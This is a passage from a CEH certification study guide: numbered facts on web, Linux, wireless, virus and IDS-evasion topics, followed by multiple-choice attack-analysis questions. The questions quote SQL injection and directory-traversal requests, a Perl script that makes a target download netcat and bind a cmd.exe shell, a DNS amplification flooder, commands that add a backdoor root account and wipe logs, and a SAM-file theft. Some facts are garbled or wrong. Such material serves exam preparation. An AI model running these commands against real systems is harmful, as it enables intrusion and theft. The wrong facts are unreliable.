C|EH Study Guide 238. Java uses a sandbox to isolate code and is therefore not vulnerable to buffer overflow attacks. 239. The GET method should never be used when sensitive data such as credit card information is being sent to a CGI program. This is because any GET command will appear in the URL. Replace the GET method with the POST method when sending data. 240. Session management web application testing is focused on checking the time validity of session tokens, length of tokens, and expiration of session tokens. 241. Website cloaking is a technique to perform a reverse IP address lookup to get the domain name of a person browsing your site. Once this is determined, you can direct them to a specific version of a page for particular domains. 242. To protect against that run on top of SSL, install a proxy server and terminate SSL at the proxy or install a hardware SSL “accelerator” and terminate SSL at this layer. 243. An example of a Web Bug is a small .jpg file that is one pixel in height and in width that can cause unwanted behavior when users browse a site. 244. SSL operates at the transport layer and S-HTTP operates at the application layer.
Web Based Password Cracking 245. Passwords can be basic, digest, or integrated. Basic sends the password in clear text so it is easily sniffed. Digest is more secure than basic because passwords are hashed. 246. Single sign-on is when users only have to remember one username and password to be authenticated to multiple services. 247. The Remote Password Assassin (RPA) is a password cracking tool that can run dictionary attacks against FTP and Web servers. To defend against these types of attacks you should: Never use a password related to a hostname, domain name, or anything else that can be found with whois Never use a password related to your hobbies, pets, relatives, or date of birth Never leave a default password Never use a password that can be found in a dictionary
Linux Hacking 248. ps is the command to list processes running on a system. 249. Rootkits can be used to hide processes, files, or registry entries. 250. The three most common commands that hackers attempt to Trojan on a Linux box are netstat, ps, and top. 251. Loadable Kernel Modules (LKM) are compiled on the fly; they do not require you to recompile the kernel). 252. Cygwin is a free UNIX subsystem that runs on top of Windows.
Hacker University
Page 22
C|EH Study Guide 253. Rootkits are often used to replace legitimate programs. For example, you could use it to replace IFCONFIG in Linux to prevent others from seeing that your network card is operating in promiscuous mode. 254. Hackers will often try to cover their tracks. On Linux machines, a hacker can remove rootkits that they installed with the ‘rm’ command. 255. The execve() system call is used with setuid to escalate privileges. The best way to protect against execve() vulnerabilities is to disable the execve() system call. 256. IP Tables, available in Linux kernel 2.4 and up and provides for stateful packet inspection (SPI). The following is an example of an IP Tables rule that allows TCP packets coming in on interface eth1 from any IP address destined for 172.16.1.1: Iptables -A INPUT -s 0/0 -I eth1 -d 172.16.1.1 -p TCP -j ACCEPT 257. Filesnarf copies files transferred via NFS over a network. 258. You can check for the presence of rootkits in Linux by typing sudo chrootkit. 259. You can wipe a Linux hard drive with the following command: For (( i = 0; i 109 278. An example of SQL injection is http://www.testsite.com/data.asp?name=me%27%3bupdate%20user table%20set%20pass%3d%27letmein%27%3b--%00 279. SQL injection can be used where there are poorly designed input validation routines. 280. The following is an example of code that is susceptible to a SQL injection attack because it provides no input validation: sSQL=”SELECT * FROM Users where Username=‟” & Request(“user”) & “‟and Password=‟” & Request(“pwd”) & “`”
Hacker University
Page 24
C|EH Study Guide Hacking Wireless Networks 281. Air Snort implements the Fluhrer-Mantin-Shamir (FMS) attack. Only encrypted packets are counted. You need to capture around five to ten million packets in order to crack WEP with AirSnort. 282. Wireless access points act like hubs on a network. Therefore, you will be able to capture more traffic in a shorter amount of time on a wireless network than on a wired network. 283. Aircrack uses KoreK’s implementation for wireless hacking. AirSnort uses the FMS attack. 284. A wireless injection attack is when you re-inject ARP requests hundreds of times per second on a wireless network. 285. SSIDs are not considered a good security mechanism to protect against a wireless network because the SSID is transmitted in clear text. 286. In warchalking, a )( symbol represents an open access point (unfiltered/unencrypted). 287. Wardriving is when a hacker drives around in a car looking for wireless networks. 288. If a wireless access point is using MAC filtering, sniff traffic on the WLAN and spoof your MAC address to one you have captured. 289. Even if a network disables SSID broadcast, you can still get the SSID by sniffing the wireless network. The SSID is still sent inside both client and AP packets. 290. Directional antennas are not enough to secure your network because wireless signals can still be detected from miles away. 291. If you are not capturing enough traffic to crack a WEP key, use a sniffer like Ettercap to discover the gateway then send an ICMP ping flood to generate traffic. 292. A rogue access point is an unauthorized access point that overrides the signal of an authorized access point. 293. 802.11a operates in the 5.15 – 5.825 GHz frequency. 294. VPNs are often used in wireless networks but they will double the overhead on an access point. 295. WEP encryption is vulnerable because there is no mutual authentication between wireless clients and access points, automated tools can discover WEP keys, and the 24 bit IV field is too small. 296. The SSID identifies your wireless network and acts as a password for network access. 297. GPSDrive can be used to map wireless access points.
Viruses 298. Messenger spam is when you receive a pop up on your screen with SPAM. It usually uses ports 1026 to 1029.
Hacker University
Page 25
C|EH Study Guide 299. The following are common file attachments that are used by viruses and malware: .scr .vbs .com .exe .pif .htm 300. MS Blaster exploits port 135 and 445. A Snort rule to detect MS Blaster will reference these ports: Alert TCP $EXTERNAL_NETWORK any $INTERNAL_NETWORK 135 Alert tcp $EXTERNAL_NETWORK any $INTERNAL_NETWORK 445 301. The European Institute for Computer Antivirus Research has created the following string that can be used as a harmless test virus to test your antivirus software: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TESTFILE!$H+H* 302. Signature based virus scanners are only as good as their signature database. If there is no signature, then a virus will not be detected. 303. To check for unauthorized changes to files, use file integrity verification tools. Tripwire is a popular file integrity verifier. 304. Antivirus programs compare the signature of executable files to a database of known viral signatures. Polymorphic viruses cannot be detected by a signature-based anti-virus program. 305. Melissa is a macro virus. 306. The Slammer worm exploits a buffer overflow in the MS-SQL resolution service. 307. The best protection against viruses is prevention, not detection. That is, you should stop viruses from getting onto the system in the first place, not just scan for viruses. One way to stop viruses from getting onto your system is to disable the use of external media such as USB thumb drives and floppy disks. 308. A worm is self-replicating while a virus attaches itself to another host. 309. Nimda exploits the directory traversal Unicode exploit in IIS. (E.g., GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.e xe?/c+dir) 310. The OSX/Leap-A virus is a MAC OS X virus that spreads via iChat.
Evading IDS, Firewalls, and Honeypots 311.
To operate Snort in packet logger mode, type ./snort –dev –l ./log
Hacker University
Page 26
C|EH Study Guide 312. Session splicing is when an attacker attempts to deliver the payload over a continuous stream of multiple small packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction. 313. Snort can operate as an IDS, packet logger, or sniffer. 314. The Send-Safe proxy server can be used to help evade honeypots. 315. Snort has great flexibility in creating rules. For example, the following rule will alert you whenever a TCP packet originating from any IP address and destined for any IP address on the 10.0.0.0 subnet on port 2222: alert tcp any any 10.0.0.0/8 2222. As another example, here is the rule to capture FTP root login attempts: alert tcp any any any any 21 (content: “user root”;). 316. A SOCKS proxy can be used to transparently connect through a firewall. SOCKS uses port 1080. 317. Obfuscation techniques include using non-standard ports or redirecting attempts to standard ports to a secure area that is logged. 318. Encrypting communication between an agent and a monitor in an IDS is useful because the monitor will know if counterfeit messages are being generated (they will not be encrypted). 319. Firewalls cannot inspect encrypted traffic such as that used with SSL on port 443. SSL can be used to mask the contents of a packet and bypass the intruder detection systems. 320. A hacker can use Tor for anonymity on the Internet by going through multiple proxy servers on the Internet. 321. Snort is a freeware, open source program that can be used to detect attacks such as port scans. 322. Fragroute is a tool that will craft packets to confuse pattern matching IDS's. 323. A honeytoken is a fake document that is set up to see if employees are accessing unauthorized documents. 324. A covert channel is making use of a protocol in a way it was not intended to be used. It is a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS’s on a network. This is sometimes called a network tunnel. 325. A host can continue to receive data as long as the SYN sequence numbers of transmitted packets from another host are lower than the packet segment containing a set FIN flag. 326. A clue that your packets might be going through a stateful inspection firewall is that a traceroute shows the same IP address twice. 327. If web servers in a DMZ are responding to ACK packets on port 80, then chances are there is no stateful inspection firewall in use.
Hacker University
Page 27
C|EH Study Guide 328. A false positive occurs when the IDS/IPS system classifies an action as anomalous when it is legitimate action. A false negative occurs when an actual intrusive action has occurred but the system allows it to pass as non-intrusive behavior.
Social Engineering 329. You will need to enforce the corporate network security policy to resolve issues with employees bypassing the firewall by attaching a modem to their telephone line and workstations. 330. Social engineering can help you bypass a firewall. For example, you can create a web page that users can click on and, upon clicking, a keylogger can be embedded on their system. 331. Social engineering is the act of getting needed information from a person rather than breaking into a system. 332. An example of a phishing attack is when you receive an e-mail asking you to click on a link that takes you to a different site than what is mentioned in the e-mail. 333. The current most common vehicle for social engineering attacks is e-mail. 334. Social engineering is easy and extremely effective method to gain information. 335. The best way to break into a highly secure system that is virtually impenetrable is to use social engineering tactics like bribing employees with money to provide you with sensitive information. 336. The weakest links in the security chain are untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain. 337. To determine the first octet of a DWORD encoded URL, divide the number by 16,777,216. 338. Another method of obfuscating URLs is to use hexadecimal equivalents. For example, 0xde = 222. 339. The three stages of reverse social engineering are sabotage, advertising/marketing, and assisting.
Physical Security 340. Piggybacking (also called tailgating) is when someone walks in behind an authorized user to gain access into a building. 341. RFID tags are often used to manage inventory but they could leak out sensitive information so they should be disabled when the tags are no longer needed. Use RFID kill switches in RFID chips to disable RFID tags when they are no longer needed
Hacker University
Page 28
C|EH Study Guide Attack Analysis Attack #1 #rm rootkit.c #ps –aux { grep inetd ; ps –aux|grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm –rf .bash* ; rm –rf /root/.bash_history ; rm –rf /usr/sbin/namedps –aux | grep inetd ; ps –aux | grep portmap ; rm /sbin/port359 ? 00:00:00 inetd #ps –aux | grep portmap #ps –aux | grep inetd ; ps –aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm –rf .bash* ; rm –rf /root/.bash_history ; rm –rf /usr/sbin/namedps –aux | grep inetd ; ps –aux | grep portmap ; rm /sbin/port359 00:00:00 inetd What is the attacker trying to do? A. Cover his/her tracks B. Port scan C. Escalate privileges D. Man-in-the-middle attack
Attack #2 GET /msadc/…../…../…../winnt/system32/cmd.exe?/c+dir+c:\HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.mspowerpoint, */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)..Host: lib.bvxttrip.org..Connection: Keep-Alive..Cookie: ASPSESSIONIDGQQQQQZU=KNOHEMW
Hacker University
Page 29
C|EH Study Guide What type of attack is being performed? A. SQL injection B. Firewalking C. Directory Traversal D. Cross-site scripting
Attack #3 A screen pops up on your screen with the following message: Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM
STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found Critical Errors. To fix the errors please do the following: 1. Download Registry Repair from http://www.repairreg.com 2.
Install Registry Repair
3. Run Registry Repair 4. Reboot your computer FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION What could cause this message? A. Windows messenger SPAM B. MyDoom virus C. Beast Trojan D. Denial of Service attack
Hacker University
Page 30
C|EH Study Guide Attack #4 You receive 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets have ICMP ID: 39612 and Seq:57072. 13 of the ICMP_ECHO packets have ICMP ID:0 and Seq:0.
What does this mean? A. Attacker is using NAT. B. Attacker modified TCP/IP stack on the attacking system. C. 77 packets are from a single subnet while 13 of the packets are from a different subnet. D. ICMP ID and Sequence numbers are set by a tool and not the operating system.
Attack #5 Log entry: 1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP TTL:63 TOS:0x10 ID:11842 DF
What service is being exploited? A. SMTP B. FTP C. WWW D. SQL
Attack #6 Mkdir –p /etc/X11/appInk/Internet/.etc Mkdir –p /etc/X11/appInk/Internet/.etcpasswd Touch –acmr /etc/passwd /etc/X11/AppInk/Internet/.etcpasswd Passwd nobody –d /usr/sbin/adduser dns –d/bin –u 0 –g 0 –s/bin/bash Hacker University
Page 31
C|EH Study Guide Passwd dns –d Touch –acmr /etc/X11/appInk/Internet/.etcpasswd /etc/passwd Touch –acmr /etc/X11/appInk/Internet/.etc /etc Is the attacker trying to change the password of an account?
How many accounts are being manipulated?
Attack #7 12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53476 DF *****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78 TCP Options => NOP NOP TS: 126045057 105803098 50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 PASS ………………. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………………….. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..
Hacker University
Page 32
C|EH Study Guide =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL: 63 TOS: 0x10 ID: 48231 DF *****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78 TCP Options => NOP NOP TS: 105803113 126045057 35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login Incorr 65 63 74 2E 0D 0A
etc…
Was the attacker successful?
Attack #8 ############################################ $port = 53;
# Spawn cmd.exe on port X
$your = “192.168.1.1”;
# Your FTP server
$user = “Anonymous”;
#login as
$pass = „
[email protected]‟;
#password
############################################ $host = $ARGV[0]; print “Starting…\n”; print “Server will download the file nc.exe from $your FTP server.\n”; system(“perl msadc.pl –h $host –C \”echo open $your >sasfile\””); system(“perl msadc.pl –h $host –C \”echo $user>>sasfile\””); system(“perl msadc.pl –h $host –C \”echo $pass>>sasfile\””); system(“perl msadc.pl –h $host –C \”echo bin>>sasfile\””); system(“perl msadc.pl –h $host –C \”echo get nc.exe>>sasfile\””); system(“perl msadc.pl –h $host –C \”echo get hacked.html>>sasfile\””);
Hacker University
Page 33
C|EH Study Guide system(“perl msadc.pl –h $host –C \”echo quit>>sasfile\””); print “Server is downloading…\n”; system(“perl msadc.pl –h $host –C \”ftp \-s\:sasfile\””); print “Press ENTER when download is finished .. (That‟s why it‟s good to have your own ftp server)\n”; $o=; print “Opening…\n”; system(“perl msadc.pl –h $host –C \”nc –l –p $port –e cmd.exe\””); print “Done.\n”; #system(“telnet $host $port”); exit(0);
What does this code do? A. Creates a share called sasfile B. Creates a backdoor account C. Opens a telnet listener that requires no username or password D. Creates a FTP server
Attack #9 use Net::DNS::Resolver; use Net::RawIP; open(LIST,”ns.list”); @list=; close LIST; chomp(@list); my $lnum=@list; my $i=0; my $loop=0;
Hacker University
Page 34
C|EH Study Guide if ($ARGV[0] eq „‟) { print “Usage: ./hackme.pl \n”; exit(0); } while($loop < $ARGV[1]) { while($i < $lnum) { my $source = $ARGV[0]; my $dnspkt = new Net::DNS::Packet(“google.com”, “ANY”); my $pktdata = $dnspkt->data; my $sock = new Net::RawIP({udp=>{}}); $sock->set({ip=> { saddr => $source, daddr => $list[$i], frag_off=>0,tos=0,id=>1565, udp => {source => 53, dest => 53, data=>$pktdata} }); $sock->send; $i++; }$loop++; $i=0;} exit(0);
What type of attack is this? A. DNS lookup attacks B. DNS reflection and amplification attack C. FTP DOS D. FTP backdoor
Hacker University
Page 35
C|EH Study Guide Attack #10 C:\> cmd /c type c:\winnt\repair\sam > c:\file.txt Volume in drive C has no label. Volume Serial Number is 3105-51BF Directory of C:\ 3/14/04 04:12a 0 AUTOEXEC.BAT 3/14/04 8:01a 322 boot.ini 3/14/05 12:44p WINNT 3/14/05 12:10p TEMP 1,221,095,103 bytes free
C:\>type file.txt C:\>copy file.txt c:\inetpub\wwwroot C:\>GET file.txt HTTP/1.1 Server: Microsoft-IIS/4.0 Date: Sun, 04 Feb 2001 15:44:12 GMT ETag: “9814ed8abc83103:8ff” Content-Length: 5131
What is the hacker trying to steal? A. file.txt B. index.html c. sam.txt d. cmd.exe
Hacker University
Page 36
C|EH Study Guide Attack #11 Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 What type of attack is this? A. Unsuccessful port scan B. The hacker has a backdoor into the compromised system C. A DNS poisoning attack D. An unsuccessful WEP attack
Hacker University
Page 37
C|EH Study Guide Attack #12 Below is the e-mail header of a spoofed header found on the Internet. What is the IP address of the true source?
Return-Path: Received: from smtp.com (fw.emumail.com [215.52.220.122]. by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807 for ; Sat, 9 Aug 2003 18:18:50 -0500 Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 Received: from ([19.25.19.10]. by smtp.com with SMTP Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. by localhost with SMTP; 8 Aug 2003 23:25:01 -0000 From: "Bill Gates" To: "mikeg" Subject: We need your help! Date: Fri, 8 Aug 2003 19:12:28 -0400 Message-ID: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950" X-Priority: 3 (Normal. X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal
Attack #13 The following code is vulnerable to what type of attack?